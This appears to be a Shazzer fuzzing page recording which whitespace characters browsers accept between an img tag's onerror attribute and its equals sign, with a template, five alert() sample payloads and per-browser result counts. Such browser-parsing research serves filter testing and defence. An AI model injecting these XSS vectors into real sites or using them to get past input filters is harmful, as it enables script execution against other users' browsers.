Shazzer logo

Characters allowed before after onerror events

Chrome logo 5
Firefox logo 5
Edge logo 5
Safari logo 5

This XSS vector shows what characters can be used before the onerror event.

t0xodile
Created byt0xodile
Created Oct 23, 2025
Updated Oct 23, 2025

Tweet
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
Template used:
<img src onerror$[chr]=log($[i])>

Sample payloads

<img src onerror0x09=alert(9)>
<img src onerror
=alert(10)>
<img src onerror0x0C=alert(12)>
<img src onerror0x0D=alert(13)>
<img src onerror =alert(32)>

Fuzz results

Chrome logo
Chrome 145.0.0.0 desktop macOS 10.15.7
Updated8 Feb 2026
Found 5 results
Loading...
Chrome logo
Chrome 144.0.0.0 desktop Windows NT 10.0older version
Updated8 Feb 2026
Found 5 results
Loading...
Chrome logo
Chrome 139.0.0.0 desktop Linux Unknownolder version
Updated23 Oct 2025
Found 5 results
Loading...
Firefox logo
Firefox 148.0 desktop Windows NT 10.0
Updated16 Feb 2026
Found 5 results
Loading...
Firefox logo
Firefox 147.2.1 mobile iOS 18.7older version
Updated3 Feb 2026
Found 5 results
Loading...
Firefox logo
Firefox 147.0 mobile Android 16older version
Updated31 Jan 2026
Found 5 results
Loading...
Firefox logo
Firefox 135.0 desktop Linux Unknownolder version
Updated28 Oct 2025
Found 5 results
Loading...
Edge logo
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated16 Feb 2026
Found 5 results
Loading...
Safari logo
Safari 26.2 desktop macOS 10.15.7
Updated30 Jan 2026
Found 5 results
Loading...
Safari logo
Safari 0 tablet iOS 18.7.3older version
Updated30 Jan 2026
Found 5 results
Loading...